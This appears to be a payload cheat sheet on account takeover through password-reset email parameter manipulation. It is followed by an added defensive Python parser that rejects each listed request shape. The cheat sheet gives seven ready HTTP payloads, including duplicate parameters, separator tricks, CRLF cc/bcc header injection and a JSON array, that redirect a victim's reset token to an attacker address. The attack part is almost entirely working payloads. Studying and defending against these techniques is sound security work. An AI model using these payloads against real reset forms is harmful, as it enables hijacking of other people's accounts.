Account Takeover: Password Reset With Manipulating Email Parameter
Exploitation
- Add attacker email as second parameter using &

  ```http
  POST /resetPassword
  [...]
  email=victim@email.com&email=attacker@email.com
  ```
- Add attacker email as second parameter using %20

  ```http
  POST /resetPassword
  [...]
  email=victim@email.com%20email=attacker@email.com
  ```
- Add attacker email as second parameter using |

  ```http
  POST /resetPassword
  [...]
  email=victim@email.com|email=attacker@email.com
  ```
- Add attacker email as second parameter using cc

  ```http
  POST /resetPassword
  [...]
  email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
  ```
- Add attacker email as second parameter using bcc

  ```http
  POST /resetPassword
  [...]
  email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
  ```
- Add attacker email as second parameter using ,

  ```http
  POST /resetPassword
  [...]
  email="victim@mail.tld",email="attacker@mail.tld"
  ```
- Add attacker email as second parameter in a JSON array

  ```http
  POST /resetPassword
  [...]
  {"email":["victim@mail.tld","attacker@mail.tld"]}
  ```
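A defensive counterpart, added here and not part of the original page: a server-side parser for the reset request that refuses every request shape listed above (duplicate `email` keys, CR/LF header injection, separator characters, JSON arrays) and mails the token only to the address stored for the matched account. The `ACCOUNTS` table, the address pattern and the function names are assumptions for the example.

```python
import json
import re
from urllib.parse import parse_qsl

# Assumption: the application only accepts plain local@domain addresses
# (no quoting, display names or comments), so anything else is rejected outright.
ADDRESS_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
FORM = "application/x-www-form-urlencoded"


def extract_reset_email(body, content_type):
    """Return exactly one syntactically valid address from the request, else None."""
    if content_type == "application/json":
        try:
            data = json.loads(body)
        except ValueError:
            return None
        # An array (or any non-string) in "email" fails the isinstance check below.
        values = [data.get("email")] if isinstance(data, dict) else []
    else:
        # parse_qsl does not split on '|', ',' or a space, so those payloads stay one
        # value and fail the address pattern; a second '&email=' yields two values.
        values = [v for k, v in parse_qsl(body, keep_blank_values=True) if k == "email"]
    if len(values) != 1 or not isinstance(values[0], str):
        return None  # zero or several candidates: never guess which one to honour
    # fullmatch rejects decoded %0a%0d (newlines) and the cc:/bcc: text after them.
    return values[0] if ADDRESS_RE.fullmatch(values[0]) else None


def reset_recipient(body, content_type, accounts):
    """Resolve the address the reset token is actually mailed to.

    The recipient is always the address on file for the matched account, never
    the raw submitted string, so a crafted value cannot redirect the email.
    """
    submitted = extract_reset_email(body, content_type)
    if submitted is None:
        return None
    account = accounts.get(submitted.lower())
    return account["email"] if account else None


# Constructed sample data (not from the page): a single registered user.
ACCOUNTS = {"victim@mail.tld": {"id": 42, "email": "victim@mail.tld"}}

if __name__ == "__main__":
    for body in ("email=victim@mail.tld", "email=victim@mail.tld&email=attacker@mail.tld"):
        print(repr(body), "->", reset_recipient(body, FORM, ACCOUNTS))
```

Returning None for an ambiguous request lets the handler respond with the same generic message it uses for unknown accounts, so the check leaks nothing about which addresses exist.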